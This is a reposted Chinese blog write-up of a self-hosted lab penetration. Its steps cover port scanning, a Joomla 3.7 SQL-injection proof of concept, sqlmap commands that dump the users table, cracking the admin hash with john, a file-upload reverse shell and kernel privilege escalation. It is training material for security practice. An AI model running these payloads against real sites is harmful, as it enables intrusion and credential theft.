记一次搭建靶场渗透过程(3)

admin 2022年8月28日09:14:31安全文章评论1 views1559字阅读5分11秒阅读模式

前言

记一次搭建靶场渗透过程(3)
记一次搭建靶场渗透过程(3)




欲善其事,必先利其器。学习好渗透最重要的是就是实践,我们可以通过在本地搭建靶场来作为我们的目标。通过对这些靶场的渗透练习,充分理解每个漏洞的原理。





记一次搭建靶场渗透过程(3)
记一次搭建靶场渗透过程(3)


渗透过程


1、搭建虚拟机我们使用最小安装,安装成功后只有一个登陆界面,虚拟机以NAT方式连接

记一次搭建靶场渗透过程(3)

2、使用namp或者masscan进行简单的端口扫描,发现只开放了80端口

记一次搭建靶场渗透过程(3)

3、访问一下80端口,页面提示我们只有一个flag,需要root提权

记一次搭建靶场渗透过程(3)

4、我们先进行一波信息收集,可以看到这个CMS是joomla的,查看版本为3.7,通过查询我们知道3.7的joomla有sql注入

Poc为:index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

记一次搭建靶场渗透过程(3)

6、我们使用sqlmap跑一下,跑出来这个库是joomladb

Payload: python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" --dbs --batch

记一次搭建靶场渗透过程(3)

7、继续跑一下数据

Payload:python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb --tables --batch

记一次搭建靶场渗透过程(3)

8、我们看到有个名叫“#_users”的表,去看看列名

payload:python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users --columns

记一次搭建靶场渗透过程(3)

9、搜索其中发现有username 和password的字段,把数据dump下来

Payload: >python sqlmap.py -u"http://192.168.131.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users -C username,password --dump

记一次搭建靶场渗透过程(3)

10、我们得到了admin的hash 用kali自带的hash解密工具john,先在kali中创建一个文件把这段hash给复制进去,然后john 文件

记一次搭建靶场渗透过程(3)

11、使用John进行解密,直接解密结果,Admin的密码为snoopy,但是我们还不知道管理员后台,在kali中用dirb跑一下

记一次搭建靶场渗透过程(3)

12、看到有一个administrator,我们直接进行访问

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

13、登陆进去后在tmp路径下有一个文件上传点

记一次搭建靶场渗透过程(3)

14、进行反弹shell,反弹成功

记一次搭建靶场渗透过程(3)

15、可以看到是一个低权限用户,所以我们考虑提权,查看一下内核版本

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

16、网上找一下对应的提权exp

记一次搭建靶场渗透过程(3)

17、使用39772进行提权,搜索到URL下载,然后上传到服务器tmp目录下,进行提权

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

18、提权成功

记一次搭建靶场渗透过程(3)

19、查看flag

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

记一次搭建靶场渗透过程(3)

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
记一次搭建靶场渗透过程(3)

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):记一次搭建靶场渗透过程(3)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日09:14:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次搭建靶场渗透过程(3) http://cn-sec.com/archives/763702.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: